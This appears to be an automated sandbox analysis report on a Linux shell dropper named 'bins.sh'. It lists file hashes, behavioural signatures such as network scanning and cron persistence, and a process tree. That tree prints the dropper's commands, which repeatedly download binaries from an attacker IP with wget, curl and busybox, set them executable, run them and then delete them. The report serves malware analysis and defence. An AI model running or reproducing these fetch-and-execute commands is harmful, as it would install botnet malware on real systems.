Analysis
-
max time kernel
150s -
max time network
181s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
05-11-2024 00:57
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
3dab97248ad8ec9b82bf014cef55938f
-
SHA1
357849b7a1f1036e07e0f6beae4e71ac80dfeb83
-
SHA256
12445e75c892094ed968bf9c0a248a1f9e29fceff07f44755fc8ceebcb3e4e37
-
SHA512
9e8525a46d5ce674e4cb17c0e023143691ef3aa3ffae1b8a3634dd1182fc459367b4fadd42eb35d5992923415fd93fab7b28b9152d00d36df38cda0178a93f80
-
SSDEEP
192:GF/o26qhFEQuuY9BFy8QzV76qhFEQsBFy8QzDn/Q:Gi26qnEQuuYPM6qnEQ2x
Malware Config
Signatures
-
Contacts a large (2222) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodpid Process 816 chmod 679 chmod 700 chmod -
Executes dropped EXE 3 IoCs
Processes:
sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7XdvXTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxBioc pid Process /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 680 sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv 701 zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv /tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB 818 XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB -
Renames itself 1 IoCs
Processes:
zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdvpid Process 702 zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.ToKYsc crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdvcurlcurldescription ioc Process File opened for reading /proc/7/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/28/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/753/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1174/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/746/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/793/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/803/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/841/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/908/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/941/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1259/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/747/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/969/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/995/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1103/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1242/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/766/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1180/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/138/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1270/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/299/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/738/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/880/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/953/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1069/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1234/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1257/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/18/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/725/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/918/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/4/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/718/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/856/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1042/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1065/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1115/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1232/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1172/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1237/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/755/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/882/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/946/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/960/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/962/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1249/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/self/auxv curl File opened for reading /proc/27/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/790/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1221/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/43/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/648/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/717/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/901/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1045/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1078/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/734/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/self/auxv curl File opened for reading /proc/926/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1173/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/19/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/773/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/789/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1052/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv -
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxwgetcurlbusyboxwgetcurlbusyboxdescription ioc Process File opened for modification /tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB busybox File opened for modification /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 wget File opened for modification /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 curl File opened for modification /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 busybox File opened for modification /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv wget File opened for modification /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv curl File opened for modification /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:645
-
/bin/rm/bin/rm bins.sh2⤵PID:647
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- Writes file to tmp directory
PID:653
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:670
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- Writes file to tmp directory
PID:676
-
-
/bin/chmodchmod 777 sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- File and Directory Permissions Modification
PID:679
-
-
/tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6./sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- Executes dropped EXE
PID:680
-
-
/bin/rmrm sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵PID:682
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- Writes file to tmp directory
PID:683
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:684
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- Writes file to tmp directory
PID:695
-
-
/bin/chmodchmod 777 zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv./zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:701 -
/bin/shsh -c "crontab -l"3⤵PID:703
-
/usr/bin/crontabcrontab -l4⤵PID:705
-
-
-
/bin/shsh -c "crontab -"3⤵PID:707
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:708
-
-
-
-
/bin/rmrm zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵PID:718
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵PID:722
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵
- Checks CPU configuration
- Reads runtime system information
PID:804
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵
- Writes file to tmp directory
PID:811
-
-
/bin/chmodchmod 777 XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB./XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵PID:820
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga2⤵PID:822
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD53c90d5820bddcf7c5d1bd21dfa49d958
SHA15ba05bd489e50af97d6dc45e3a0be60e494d5083
SHA256bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2
SHA51254a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a
-
Filesize
122KB
MD5cd3d4b9c643e5b473fb4d88ed05f0716
SHA164ee7a97418583d759eaea8000890cc3bae1b5f4
SHA2560cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD5aad70c49c8bac060620a0b1e37a4c51f
SHA162e4f64c9960f8458d75c8307452fbe3de8f0c04
SHA2561df5dc954ba44edc26daa8acf647349e2126aff23fe43af49cb41684287532a4
SHA512eef97daaee2fba6cf3aec9fc26ee9523bae04c33194388856ced43c221ac37858d420c7168ea5f69ff454d5eb587d9fe393e9cc9ea34928271b5e8c26a5940bd